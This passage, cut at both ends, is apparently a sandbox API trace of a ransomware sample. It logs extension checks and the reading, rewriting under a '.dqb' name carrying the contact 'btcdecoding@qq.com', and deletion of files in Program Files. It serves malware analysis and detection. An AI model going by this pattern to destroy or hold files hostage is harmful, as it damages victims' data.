(lpString=".docx") returned 5 [0046.012] lstrcmpiW (lpString1=".docx", lpString2="L.PNG") returned -1 [0046.012] lstrlenW (lpString=".pdf") returned 4 [0046.012] lstrcmpiW (lpString1=".pdf", lpString2=".PNG") returned -1 [0046.012] lstrlenW (lpString=".xls") returned 4 [0046.012] lstrcmpiW (lpString1=".xls", lpString2=".PNG") returned 1 [0046.012] lstrlenW (lpString=".xlsx") returned 5 [0046.012] lstrcmpiW (lpString1=".xlsx", lpString2="L.PNG") returned -1 [0046.013] lstrlenW (lpString=".ppt") returned 4 [0046.013] lstrcmpiW (lpString1=".ppt", lpString2=".PNG") returned 1 [0046.013] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SONORA\\THMBNAIL.PNG") returned 75 [0046.013] lstrlenW (lpString=".zip") returned 4 [0046.013] lstrcmpiW (lpString1=".zip", lpString2=".PNG") returned 1 [0046.013] lstrlenW (lpString=".rar") returned 4 [0046.013] lstrcmpiW (lpString1=".rar", lpString2=".PNG") returned 1 [0046.013] lstrlenW (lpString=".bz2") returned 4 [0046.013] lstrcmpiW (lpString1=".bz2", lpString2=".PNG") returned -1 [0046.013] lstrlenW (lpString=".7z") returned 3 [0046.013] lstrcmpiW (lpString1=".7z", lpString2="PNG") returned -1 [0046.013] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SONORA\\THMBNAIL.PNG") returned 75 [0046.013] lstrlenW (lpString=".dbf") returned 4 [0046.013] lstrcmpiW (lpString1=".dbf", lpString2=".PNG") returned -1 [0046.013] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SONORA\\THMBNAIL.PNG") returned 75 [0046.013] lstrlenW (lpString=".1cd") returned 4 [0046.013] lstrcmpiW (lpString1=".1cd", lpString2=".PNG") returned -1 [0046.013] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SONORA\\THMBNAIL.PNG") returned 75 [0046.013] lstrlenW (lpString=".jpg") returned 4 [0046.013] lstrcmpiW (lpString1=".jpg", lpString2=".PNG") returned -1 [0046.570] SetFilePointerEx (in: hFile=0x214, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x227fec8 | out: lpNewFilePointer=0x0) returned 1 [0046.572] SetFilePointerEx (in: hFile=0x214, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x227fec8 | out: lpNewFilePointer=0x0) returned 1 [0046.572] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\WATER\\THMBNAIL.PNG.id-9C354B42.[btcdecoding@qq.com].dqb" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\water\\thmbnail.png.id-9c354b42.[btcdecoding@qq.com].dqb"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x20c [0046.573] GetLastError () returned 0x0 [0046.580] ReadFile (in: hFile=0x214, lpBuffer=0x3540020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x227fed4, lpOverlapped=0x0 | out: lpBuffer=0x3540020*, lpNumberOfBytesRead=0x227fed4*=0xa5d5, lpOverlapped=0x0) returned 1 [0046.604] WriteFile (in: hFile=0x20c, lpBuffer=0x3540020*, nNumberOfBytesToWrite=0xa5e0, lpNumberOfBytesWritten=0x227fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3540020*, lpNumberOfBytesWritten=0x227fc9c*=0xa5e0, lpOverlapped=0x0) returned 1 [0046.606] ReadFile (in: hFile=0x214, lpBuffer=0x3540020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x227fed4, lpOverlapped=0x0 | out: lpBuffer=0x3540020*, lpNumberOfBytesRead=0x227fed4*=0x0, lpOverlapped=0x0) returned 1 [0046.606] WriteFile (in: hFile=0x20c, lpBuffer=0x3540020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x227fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3540020*, lpNumberOfBytesWritten=0x227fc9c*=0xec, lpOverlapped=0x0) returned 1 [0046.606] SetEndOfFile (hFile=0x20c) returned 1 [0046.606] CloseHandle (hObject=0x20c) returned 1 [0046.606] SetFilePointerEx (in: hFile=0x214, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x227fec8 | out: lpNewFilePointer=0x0) returned 1 [0046.606] SetEndOfFile (hFile=0x214) returned 1 [0046.607] CloseHandle (hObject=0x214) returned 1 [0046.607] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\WATER\\THMBNAIL.PNG.id-9C354B42.[btcdecoding@qq.com].dqb", dwFileAttributes=0x20) returned 1 [0046.608] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\WATER\\THMBNAIL.PNG" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\water\\thmbnail.png")) returned 1 [0046.608] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\WATER\\THMBNAIL.PNG") returned 74 [0046.608] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\WATER\\THMBNAIL.PNG") returned 74 [0046.608] lstrlenW (lpString=".doc") returned 4 [0046.608] lstrcmpiW (lpString1=".doc", lpString2=".PNG") returned -1 [0046.608] lstrlenW (lpString=".docx") returned 5 [0046.608] lstrcmpiW (lpString1=".docx", lpString2="L.PNG") returned -1 [0046.608] lstrlenW (lpString=".pdf") returned 4 [0046.608] lstrcmpiW (lpString1=".pdf", lpString2=".PNG") returned -1 [0046.608] lstrlenW (lpString=".xls") returned 4 [0046.608] lstrcmpiW (lpString1=".xls", lpString2=".PNG") returned 1 [0046.608] lstrlenW (lpString=".xlsx") returned 5 [0046.608] lstrcmpiW (lpString1=".xlsx", lpString2="L.PNG") returned -1 [0046.608] lstrlenW (lpString=".ppt") returned 4 [0046.608] lstrcmpiW (lpString1=".ppt", lpString2=".PNG") returned 1 [0046.608] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\WATER\\THMBNAIL.PNG") returned 74 [0046.608] lstrlenW (lpString=".zip") returned 4 [0046.608] lstrcmpiW (lpString1=".zip", lpString2=".PNG") returned 1 [0046.608] lstrlenW (lpString=".rar") returned 4 [0046.608] lstrcmpiW (lpString1=".rar", lpString2=".PNG") returned 1 [0046.608] lstrlenW (lpString=".bz2") returned 4 [0046.608] lstrcmpiW (lpString1=".bz2", lpString2=".PNG") returned -1 [0046.608] lstrlenW (lpString=".7z") returned 3 [0046.608] lstrcmpiW (lpString1=".7z", lpString2="PNG") returned -1 [0046.608] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\WATER\\THMBNAIL.PNG") returned 74 [0046.608] lstrlenW (lpString=".dbf") returned 4 [0046.608] lstrcmpiW (lpString1=".dbf", lpString2=".PNG") returned -1 [0046.608] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\WATER\\THMBNAIL.PNG") returned 74 [0046.609] lstrlenW (lpString=".1cd") returned 4 [0046.609] lstrcmpiW (lpString1=".1cd", lpString2=".PNG") returned -1 [0046.609] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\WATER\\THMBNAIL.PNG") returned 74 [0046.609] lstrlenW (lpString=".jpg") returned 4 [0046.609] lstrcmpiW (lpString1=".jpg", lpString2=".PNG") returned -1 [0046.734] SetFilePointerEx (in: hFile=0x1f8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x227fec8 | out: lpNewFilePointer=0x0) returned 1 [0046.734] SetFilePointerEx (in: hFile=0x1f8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x227fec8 | out: lpNewFilePointer=0x0) returned 1 [0046.734] CreateFileW (lpFileName="C:\\Program Files\\desktop.ini.id-9C354B42.[btcdecoding@qq.com].dqb" (normalized: "c:\\program files\\desktop.ini.id-9c354b42.[btcdecoding@qq.com].dqb"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x21c [0046.735] GetLastError () returned 0x0 [0046.735] ReadFile (in: hFile=0x1f8, lpBuffer=0x3540020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x227fed4, lpOverlapped=0x0 | out: lpBuffer=0x3540020*, lpNumberOfBytesRead=0x227fed4*=0xae, lpOverlapped=0x0) returned 1 [0046.735] WriteFile (in: hFile=0x21c, lpBuffer=0x3540020*, nNumberOfBytesToWrite=0xb0, lpNumberOfBytesWritten=0x227fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3540020*, lpNumberOfBytesWritten=0x227fc9c*=0xb0, lpOverlapped=0x0) returned 1 [0046.736] ReadFile (in: hFile=0x1f8, lpBuffer=0x3540020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x227fed4, lpOverlapped=0x0 | out: lpBuffer=0x3540020*, lpNumberOfBytesRead=0x227fed4*=0x0, lpOverlapped=0x0) returned 1 [0046.736] WriteFile (in: hFile=0x21c, lpBuffer=0x3540020*, nNumberOfBytesToWrite=0xea, lpNumberOfBytesWritten=0x227fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3540020*, lpNumberOfBytesWritten=0x227fc9c*=0xea, lpOverlapped=0x0) returned 1 [0046.736] SetEndOfFile (hFile=0x21c) returned 1 [0046.736] CloseHandle (hObject=0x21c) returned 1 [0046.736] SetFilePointerEx (in: hFile=0x1f8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x227fec8 | out: lpNewFilePointer=0x0) returned 1 [0046.736] SetEndOfFile (hFile=0x1f8) returned 1 [0046.737] CloseHandle (hObject=0x1f8) returned 1 [0046.737] SetFileAttributesW (lpFileName="C:\\Program Files\\desktop.ini.id-9C354B42.[btcdecoding@qq.com].dqb", dwFileAttributes=0x26) returned 1 [0046.737] DeleteFileW (lpFileName="C:\\Program Files\\desktop.ini" (normalized: "c:\\program files\\desktop.ini")) returned 1 [0046.738] lstrlenW (lpString="C:\\Program Files\\desktop.ini") returned 28 [0046.738] lstrlenW (lpString="C:\\Program Files\\desktop.ini") returned 28 [0046.738] lstrlenW (lpString=".doc") returned 4 [0046.738] lstrcmpiW (lpString1=".doc", lpString2=".ini") returned -1 [0046.738] lstrlenW (lpString=".docx") returned 5 [0046.738] lstrcmpiW (lpString1=".docx", lpString2="p.ini") returned -1 [0046.738] lstrlenW (lpString=".pdf") returned 4 [0046.738] lstrcmpiW (lpString1=".pdf", lpString2=".ini") returned 1 [0046.738] lstrlenW (lpString=".xls") returned 4 [0046.738] lstrcmpiW (lpString1=".xls", lpString2=".ini") returned 1 [0046.738] lstrlenW (lpString=".xlsx") returned 5 [0046.738] lstrcmpiW (lpString1=".xlsx", lpString2="p.ini") returned -1 [0046.738] lstrlenW (lpString=".ppt") returned 4 [0046.738] lstrcmpiW (lpString1=".ppt", lpString2=".ini") returned 1 [0046.738] lstrlenW (lpString="C:\\Program Files\\desktop.ini") returned 28 [0046.738] lstrlenW (lpString=".zip") returned 4 [0046.738] lstrcmpiW (lpString1=".zip", lpString2=".ini") returned 1 [0046.738] lstrlenW (lpString=".rar") returned 4 [0046.738] lstrcmpiW (lpString1=".rar", lpString2=".ini") returned 1 [0046.738] lstrlenW (lpString=".bz2") returned 4 [0046.738] lstrcmpiW (lpString1=".bz2", lpString2=".ini") returned -1 [0046.738] lstrlenW (lpString=".7z") returned 3 [0046.738] lstrcmpiW (lpString1=".7z", lpString2="ini") returned -1 [0046.738] lstrlenW (lpString="C:\\Program Files\\desktop.ini") returned 28 [0046.738] lstrlenW (lpString=".dbf") returned 4 [0046.738] lstrcmpiW (lpString1=".dbf", lpString2=".ini") returned -1 [0046.738] lstrlenW (lpString="C:\\Program Files\\desktop.ini") returned 28 [0046.738] lstrlenW (lpString=".1cd") returned 4 [0046.738] lstrcmpiW (lpString1=".1cd", lpString2=".ini") returned -1 [0046.738] lstrlenW (lpString="C:\\Program Files\\desktop.ini") returned 28 [0046.738] lstrlenW (lpString=".jpg") returned 4 [0046.738] lstrcmpiW (lpString1=".jpg", lpString2=".ini") returned 1 [0048.987] SetFilePointerEx (in: hFile=0x228, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x227fec8 | out: lpNewFilePointer=0x0) returned 1 [0048.987] SetFilePointerEx (in: hFile=0x228, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x227fec8 | out: lpNewFilePointer=0x0) returned 1 [0048.987] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Analysis Services\\AS OLEDB\\10\\Cartridges\\msjet.xsl.id-9C354B42.[btcdecoding@qq.com].dqb" (normalized: "c:\\program files\\microsoft analysis services\\as oledb\\10\\cartridges\\msjet.xsl.id-9c354b42.[btcdecoding@qq.com].dqb"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x224 [0048.994] GetLastError () returned 0x0 [0049.001] ReadFile (in: hFile=0x228, lpBuffer=0x3540020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x227fed4, lpOverlapped=0x0 | out: lpBuffer=0x3540020*, lpNumberOfBytesRead=0x227fed4*=0x712e, lpOverlapped=0x0) returned 1 [0049.023] WriteFile (in: hFile=0x224, lpBuffer=0x3540020*, nNumberOfBytesToWrite=0x7130, lpNumberOfBytesWritten=0x227fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3540020*, lpNumberOfBytesWritten=0x227fc9c*=0x7130, lpOverlapped=0x0) returned 1 [0049.025] ReadFile (in: hFile=0x228, lpBuffer=0x3540020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x227fed4, lpOverlapped=0x0 | out: lpBuffer=0x3540020*, lpNumberOfBytesRead=0x227fed4*=0x0, lpOverlapped=0x0) returned 1 [0049.025] WriteFile (in: hFile=0x224, lpBuffer=0x3540020*, nNumberOfBytesToWrite=0xe6, lpNumberOfBytesWritten=0x227fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3540020*, lpNumberOfBytesWritten=0x227fc9c*=0xe6, lpOverlapped=0x0) returned 1 [0049.025] SetEndOfFile (hFile=0x224) returned 1 [0049.025] CloseHandle (hObject=0x224) returned 1 [0049.025] SetFilePointerEx (in: hFile=0x228, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x227fec8 | out: lpNewFilePointer=0x0) returned 1 [0049.025] SetEndOfFile (hFile=0x228) returned 1 [0049.026] CloseHandle (hObject=0x228) returned 1 [0049.026] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Analysis Services\\AS OLEDB\\10\\Cartridges\\msjet.xsl.id-9C354B42.[btcdecoding@qq.com].dqb", dwFileAttributes=0x20) returned 1 [0049.026] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Analysis Services\\AS OLEDB\\10\\Cartridges\\msjet.xsl" (normalized: "c:\\program files\\microsoft analysis services\\as oledb\\10\\cartridges\\msjet.xsl")) returned 1 [0049.026] lstrlenW (lpString="C:\\Program Files\\Microsoft Analysis Services\\AS OLEDB\\10\\Cartridges\\msjet.xsl") returned 77 [0049.027] lstrlenW (lpString="C:\\Program Files\\Microsoft Analysis Services\\AS OLEDB\\10\\Cartridges\\msjet.xsl") returned 77 [0049.027] lstrlenW (lpString=".doc") returned 4 [0049.027] lstrcmpiW (lpString1=".doc", lpString2=".xsl") returned -1 [0049.027] lstrlenW (lpString=".docx") returned 5 [0049.027] lstrcmpiW (lpString1=".docx", lpString2="t.xsl") returned -1 [0049.027] lstrlenW (lpString=".pdf") returned 4 [0049.027] lstrcmpiW (lpString1=".pdf", lpString2=".xsl") returned -1 [0049.027] lstrlenW (lpString=".xls") returned 4 [0049.027] lstrcmpiW (lpString1=".xls", lpString2=".xsl") returned -1 [0049.027] lstrlenW (lpString=".xlsx") returned 5 [0049.027] lstrcmpiW (lpString1=".xlsx", lpString2="t.xsl") returned -1 [0049.027] lstrlenW (lpString=".ppt") returned 4 [0049.027] lstrcmpiW (lpString1=".ppt", lpString2=".xsl") returned -1 [0049.027] lstrlenW (lpString="C:\\Program Files\\Microsoft Analysis Services\\AS OLEDB\\10\\Cartridges\\msjet.xsl") returned 77 [0049.027] lstrlenW (lpString=".zip") returned 4 [0049.027] lstrcmpiW (lpString1=".zip", lpString2=".xsl") returned 1 [0049.027] lstrlenW (lpString=".rar") returned 4 [0049.027] lstrcmpiW (lpString1=".rar", lpString2=".xsl") returned -1 [0049.027] lstrlenW (lpString=".bz2") returned 4 [0049.027] lstrcmpiW (lpString1=".bz2", lpString2=".xsl") returned -1 [0049.027] lstrlenW (lpString=".7z") returned 3 [0049.027] lstrcmpiW (lpString1=".7z", lpString2="xsl") returned -1 [0049.027] lstrlenW (lpString="C:\\Program Files\\Microsoft Analysis Services\\AS OLEDB\\10\\Cartridges\\msjet.xsl") returned 77 [0049.027] lstrlenW (lpString=".dbf") returned 4 [0049.027] lstrcmpiW (lpString1=".dbf", lpString2=".xsl") returned -1 [0049.027] lstrlenW (lpString="C:\\Program Files\\Microsoft Analysis Services\\AS OLEDB\\10\\Cartridges\\msjet.xsl") returned 77 [0049.027] lstrlenW (lpString=".1cd") returned 4 [0049.027] lstrcmpiW (lpString1=".1cd", lpString2=".xsl") returned -1 [0049.027] lstrlenW (lpString="C:\\Program Files\\Microsoft Analysis Services\\AS OLEDB\\10\\Cartridges\\msjet.xsl") returned 77 [0049.027] lstrlenW (lpString=".jpg") returned 4 [0049.027] lstrcmpiW (lpString1=".jpg", lpString2=".xsl") returned -1 [0050.199] GetFileSizeEx (in: hFile=0x184, lpFileSize=0x227ff1c | out: lpFileSize=0x227ff1c*=6684) returned 1 [0050.199] CloseHandle (hObject=0x184) returned 1 [0050.199] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00037_.GIF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\ag00037_.gif")) returned 0x20 [0050.199] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00037_.GIF.id-9C354B42.[btcdecoding@qq.com].dqb" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\ag00037_.gif.id-9c354b42.[btcdecoding@qq.com].dqb")) returned 0xffffffff [0050.305] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00037_.GIF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\ag00037_.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x214 [0050.305] SetFilePointerEx (in: hFile=0x214, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x227fec8 | out: lpNewFilePointer=0x0) returned 1 [0050.306] SetFilePointerEx (in: hFile=0x214, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x227fec8 | out: lpNewFilePointer=0x0) returned 1 [0050.306] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00037_.GIF.id-9C354B42.[btcdecoding@qq.com].dqb" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\ag00037_.gif.id-9c354b42.[btcdecoding@qq.com].dqb"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x184 [0050.421] GetLastError () returned 0x0 [0050.421] ReadFile (in: hFile=0x214, lpBuffer=0x3540020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x227fed4, lpOverlapped=0x0 | out: lpBuffer=0x3540020*, lpNumberOfBytesRead=0x227fed4*=0x1a1c, lpOverlapped=0x0) returned 1 [0050.423] WriteFile (in: hFile=0x184, lpBuffer=0x3540020*, nNumberOfBytesToWrite=0x1a20, lpNumberOfBytesWritten=0x227fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3540020*, lpNumberOfBytesWritten=0x227fc9c*=0x1a20, lpOverlapped=0x0) returned 1 [0050.424] ReadFile (in: hFile=0x214, lpBuffer=0x3540020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x227fed4, lpOverlapped=0x0 | out: lpBuffer=0x3540020*, lpNumberOfBytesRead=0x227fed4*=0x0, lpOverlapped=0x0) returned 1 [0050.424] WriteFile (in: hFile=0x184, lpBuffer=0x3540020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x227fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3540020*, lpNumberOfBytesWritten=0x227fc9c*=0xec, lpOverlapped=0x0) returned 1 [0050.424] SetEndOfFile (hFile=0x184) returned 1 [0050.424] CloseHandle (hObject=0x184) returned 1 [0050.424] SetFilePointerEx (in: hFile=0x214, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x227fec8 | out: lpNewFilePointer=0x0) returned 1 [0050.424] SetEndOfFile (hFile=0x214) returned 1 [0050.425] CloseHandle (hObject=0x214) returned 1 [0050.425] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00037_.GIF.id-9C354B42.[btcdecoding@qq.com].dqb", dwFileAttributes=0x20) returned 1 [0050.425] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00037_.GIF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\ag00037_.gif")) returned 1 [0050.425] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00037_.GIF") returned 63 [0050.425] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00037_.GIF") returned 63 [0050.425] lstrlenW (lpString=".doc") returned 4 [0050.425] lstrcmpiW (lpString1=".doc", lpString2=".GIF") returned -1 [0050.425] lstrlenW (lpString=".docx") returned 5 [0050.425] lstrcmpiW (lpString1=".docx", lpString2="_.GIF") returned -1 [0050.425] lstrlenW (lpString=".pdf") returned 4 [0050.425] lstrcmpiW (lpString1=".pdf", lpString2=".GIF") returned 1 [0050.425] lstrlenW (lpString=".xls") returned 4 [0050.426] lstrcmpiW (lpString1=".xls", lpString2=".GIF") returned 1 [0050.426] lstrlenW (lpString=".xlsx") returned 5 [0050.426] lstrcmpiW (lpString1=".xlsx", lpString2="_.GIF") returned -1 [0050.426] lstrlenW (lpString=".ppt") returned 4 [0050.426] lstrcmpiW (lpString1=".ppt", lpString2=".GIF") returned 1 [0050.426] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00037_.GIF") returned 63 [0050.426] lstrlenW (lpString=".zip") returned 4 [0050.426] lstrcmpiW (lpString1=".zip", lpString2=".GIF") returned 1 [0050.426] lstrlenW (lpString=".rar") returned 4 [0050.426] lstrcmpiW (lpString1=".rar", lpString2=".GIF") returned 1 [0050.426] lstrlenW (lpString=".bz2") returned 4 [0050.426] lstrcmpiW (lpString1=".bz2", lpString2=".GIF") returned -1 [0050.426] lstrlenW (lpString=".7z") returned 3 [0050.426] lstrcmpiW (lpString1=".7z", lpString2="GIF") returned -1 [0050.426] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00037_.GIF") returned 63 [0050.426] lstrlenW (lpString=".dbf") returned 4 [0050.426] lstrcmpiW (lpString1=".dbf", lpString2=".GIF") returned -1 [0050.426] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00037_.GIF") returned 63 [0050.426] lstrlenW (lpString=".1cd") returned 4 [0050.426] lstrcmpiW (lpString1=".1cd", lpString2=".GIF") returned -1 [0050.426] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00037_.GIF") returned 63 [0050.426] lstrlenW (lpString=".jpg") returned 4 [0050.426] lstrcmpiW (lpString1=".jpg", lpString2=".GIF") returned 1 [0050.426] SetFilePointerEx (in: hFile=0x214, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x227fec8 | out: lpNewFilePointer=0x0) returned 1 [0050.474] SetFilePointerEx (in: hFile=0x214, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x227fec8 | out: lpNewFilePointer=0x0) returned 1 [0050.474] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00052_.GIF.id-9C354B42.[btcdecoding@qq.com].dqb" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\ag00052_.gif.id-9c354b42.[btcdecoding@qq.com].dqb"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x184 [0050.474] GetLastError () returned 0x0 [0050.474] ReadFile (in: hFile=0x214, lpBuffer=0x3540020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x227fed4, lpOverlapped=0x0 | out: lpBuffer=0x3540020*, lpNumberOfBytesRead=0x227fed4*=0x1e06, lpOverlapped=0x0) returned 1 [0050.478] WriteFile (in: hFile=0x184, lpBuffer=0x3540020*, nNumberOfBytesToWrite=0x1e10, lpNumberOfBytesWritten=0x227fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3540020*, lpNumberOfBytesWritten=0x227fc9c*=0x1e10, lpOverlapped=0x0) returned 1 [0050.479] ReadFile (in: hFile=0x214, lpBuffer=0x3540020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x227fed4, lpOverlapped=0x0 | out: lpBuffer=0x3540020*, lpNumberOfBytesRead=0x227fed4*=0x0, lpOverlapped=0x0) returned 1 [0050.479] WriteFile (in: hFile=0x184, lpBuffer=0x3540020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x227fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3540020*, lpNumberOfBytesWritten=0x227fc9c*=0xec, lpOverlapped=0x0) returned 1 [0050.479] SetEndOfFile (hFile=0x184) returned 1 [0050.479] CloseHandle (hObject=0x184) returned 1 [0050.479] SetFilePointerEx (in: hFile=0x214, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x227fec8 | out: lpNewFilePointer=0x0) returned 1 [0050.479] SetEndOfFile (hFile=0x214) returned 1 [0050.480] CloseHandle (hObject=0x214) returned 1 [0050.480] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00052_.GIF.id-9C354B42.[btcdecoding@qq.com].dqb", dwFileAttributes=0x20) returned 1 [0050.480] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00052_.GIF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\ag00052_.gif")) returned 1 [0050.480] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00052_.GIF") returned 63 [0050.480] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00052_.GIF") returned 63 [0050.480] lstrlenW (lpString=".doc") returned 4 [0050.481] lstrcmpiW (lpString1=".doc", lpString2=".GIF") returned -1 [0050.481] lstrlenW (lpString=".docx") returned 5 [0050.481] lstrcmpiW (lpString1=".docx", lpString2="_.GIF") returned -1 [0050.481] lstrlenW (lpString=".pdf") returned 4 [0050.481] lstrcmpiW (lpString1=".pdf", lpString2=".GIF") returned 1 [0050.481] lstrlenW (lpString=".xls") returned 4 [0050.481] lstrcmpiW (lpString1=".xls", lpString2=".GIF") returned 1 [0050.481] lstrlenW (lpString=".xlsx") returned 5 [0050.481] lstrcmpiW (lpString1=".xlsx", lpString2="_.GIF") returned -1 [0050.481] lstrlenW (lpString=".ppt") returned 4 [0050.481] lstrcmpiW (lpString1=".ppt", lpString2=".GIF") returned 1 [0050.481] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00052_.GIF") returned 63 [0050.481] lstrlenW (lpString=".zip") returned 4 [0050.481] lstrcmpiW (lpString1=".zip", lpString2=".GIF") returned 1 [0050.481] lstrlenW (lpString=".rar") returned 4 [0050.481] lstrcmpiW (lpString1=".rar", lpString2=".GIF") returned 1 [0050.481] lstrlenW (lpString=".bz2") returned 4 [0050.481] lstrcmpiW (lpString1=".bz2", lpString2=".GIF") returned -1 [0050.481] lstrlenW (lpString=".7z") returned 3 [0050.481] lstrcmpiW (lpString1=".7z", lpString2="GIF") returned -1 [0050.481] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00052_.GIF") returned 63 [0050.481] lstrlenW (lpString=".dbf") returned 4 [0050.481] lstrcmpiW (lpString1=".dbf", lpString2=".GIF") returned -1 [0050.481] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00052_.GIF") returned 63 [0050.481] lstrlenW (lpString=".1cd") returned 4 [0050.481] lstrcmpiW (lpString1=".1cd", lpString2=".GIF") returned -1 [0050.481] lstrlenW (lpString="C:\\Program Files\\Microsoft 